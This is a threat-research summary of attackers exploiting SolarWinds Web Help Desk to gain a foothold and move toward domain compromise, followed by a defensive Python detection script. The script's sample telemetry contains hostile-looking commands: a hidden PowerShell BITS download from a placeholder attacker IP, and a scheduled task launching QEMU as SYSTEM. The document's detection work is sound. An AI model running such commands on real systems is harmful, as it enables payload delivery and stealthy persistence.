- The Microsoft Defender Research Team observed a multi-stage intrusion in which threat actors exploited internet-exposed SolarWinds Web Help Desk (WHD) instances to gain an initial foothold and then moved laterally toward other high-value assets within the organization.
- However, we have not yet confirmed whether the attacks are related to the most recent set of WHD vulnerabilities disclosed on January 28, 2026, such as CVE-2025-40551 and CVE-2025-40536, or stem from previously disclosed vulnerabilities like CVE-2025-26399.
- Because the attacks occurred in December 2025 and hit machines that were vulnerable to both the old and the new sets of CVEs at the same time, we cannot reliably confirm the exact CVE used to gain the initial foothold.
- This activity reflects a common but high-impact pattern: a single exposed application can provide a path to full domain compromise when vulnerabilities are unpatched or insufficiently monitored.
- In this intrusion, the attackers relied heavily on living-off-the-land techniques, legitimate administrative tools, and low-noise persistence mechanisms.
- These tradecraft choices reinforce the importance of defense in depth, timely patching of internet-facing services, and behavior-based detection across the identity, endpoint, and network layers.
Article Summaries:
- Microsoft Defender's Research Team has identified in-the-wild exploitation of internet-exposed SolarWinds Web Help Desk (WHD) instances. Attackers leveraged one or more vulnerabilities (CVE-2025-40551, CVE-2025-40536, CVE-2025-26399) to achieve unauthenticated remote code execution, then used PowerShell and BITS to download a payload that installed a legitimate RMM tool (Zoho ManageEngine). From there they enumerated domain users, set up reverse SSH/RDP access, and created a scheduled task that launched a QEMU virtual machine under SYSTEM to hide activity. DLL sideloading via wab.exe was also used for LSASS credential theft. The investigation is ongoing, with Microsoft providing detection and hardening guidance.
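The tradecraft in that summary (a PowerShell download over BITS, a scheduled task that launches QEMU as SYSTEM, and wab.exe loading a sideloaded DLL) is the kind of behaviour the page says should be caught by behaviour-based detection. The block below is an added example, not code from the page and not Microsoft's detection guidance: it triages constructed process-creation and image-load records with heuristics that are this example's own assumptions. The rule names, the event field names, the list of directories from which wab.exe is trusted to load DLLs, the sample paths, and the 203.0.113.7 address are all made up for the illustration.

```python
import re
from dataclasses import dataclass


@dataclass
class Event:
    """Minimal endpoint telemetry record (field names are this example's own)."""
    kind: str           # "process" (creation) or "imageload"
    image: str          # path of the created process / of the loading process
    cmdline: str = ""   # command line (process events only)
    user: str = ""      # account the process runs as
    loaded: str = ""    # DLL path (imageload events only)


# Heuristics for the three behaviours named in the summary. These patterns are
# assumptions made for the example, not published detection rules.
BITS_RE = re.compile(r"start-bitstransfer|bitsadmin(?:\.exe)?\s+/transfer", re.I)
URL_RE = re.compile(r"https?://", re.I)
QEMU_RE = re.compile(r"qemu-system-[\w-]+\.exe", re.I)
RUN_AS_SYSTEM_RE = re.compile(r'/ru\s+"?(?:nt authority\\)?system\b', re.I)
SYSTEM_ACCOUNTS = {"nt authority\\system", "system", "s-1-5-18"}
# Assumption: a legitimate wab.exe only loads DLLs from these trees; anything
# else (for example a wab32.dll dropped next to a copied wab.exe) is sideloading.
TRUSTED_DLL_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def basename(path):
    """Lower-cased file name of a Windows path (accepts / or \\ separators)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(ev):
    """Return the names of the rules that fire on a single event."""
    hits = []
    name = basename(ev.image)
    cmd = ev.cmdline
    if ev.kind == "process":
        # PowerShell pulling a payload over BITS from a URL.
        if name in ("powershell.exe", "pwsh.exe") and BITS_RE.search(cmd) and URL_RE.search(cmd):
            hits.append("powershell_bits_download")
        # schtasks creating a task that runs a QEMU binary as SYSTEM.
        if (name == "schtasks.exe" and "/create" in cmd.lower()
                and QEMU_RE.search(cmd) and RUN_AS_SYSTEM_RE.search(cmd)):
            hits.append("schtasks_qemu_as_system")
        # A QEMU process actually running under the SYSTEM account.
        if QEMU_RE.fullmatch(name) and ev.user.lower() in SYSTEM_ACCOUNTS:
            hits.append("qemu_running_as_system")
    elif ev.kind == "imageload":
        dll = ev.loaded.replace("/", "\\").lower()
        if name == "wab.exe" and not dll.startswith(TRUSTED_DLL_DIRS):
            hits.append("wab_dll_sideload")
    return hits


def triage(events):
    """Map each rule name to the images it fired on across a batch of events."""
    out = {}
    for ev in events:
        for rule in check_event(ev):
            out.setdefault(rule, []).append(ev.image)
    return out


# Constructed sample telemetry (not from the incident); paths, host, and
# task name are invented. The last three records are benign look-alikes.
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          cmdline=r'powershell.exe -nop -w hidden -c "Start-BitsTransfer -Source '
                  r'http://203.0.113.7/pkg.zip -Destination C:\ProgramData\pkg.zip"',
          user="NT AUTHORITY\\SYSTEM"),
    Event("process", r"C:\Windows\System32\schtasks.exe",
          cmdline=r'schtasks.exe /create /tn Updater /sc onstart /ru SYSTEM '
                  r'/tr "C:\ProgramData\q\qemu-system-x86_64.exe -hda C:\ProgramData\q\disk.qcow2"'),
    Event("process", r"C:\ProgramData\q\qemu-system-x86_64.exe",
          cmdline="qemu-system-x86_64.exe -hda disk.qcow2", user="NT AUTHORITY\\SYSTEM"),
    Event("imageload", r"C:\Users\Public\wab.exe", loaded=r"C:\Users\Public\wab32.dll"),
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          cmdline="powershell.exe Get-Process", user="CORP\\admin"),
    Event("process", r"C:\Windows\System32\schtasks.exe", cmdline="schtasks.exe /query /tn Updater"),
    Event("imageload", r"C:\Program Files\Windows Mail\wab.exe",
          loaded=r"C:\Program Files\Common Files\System\wab32.dll"),
]


def run_sample():
    """Triage the constructed sample; returns the rule -> images mapping."""
    return triage(SAMPLE_EVENTS)


if __name__ == "__main__":
    for rule, images in run_sample().items():
        print(f"{rule}: {images}")
```

Each rule keys on a behaviour rather than on a hash or a file name, so a renamed payload or a different download host still fires, while the benign records (an interactive PowerShell session, a `schtasks /query`, and wab.exe loading its DLL from Program Files) stay quiet. In a real deployment the same logic would run over Sysmon or EDR process-creation and image-load telemetry, and the trusted-directory list for wab.exe would be tuned to the environment.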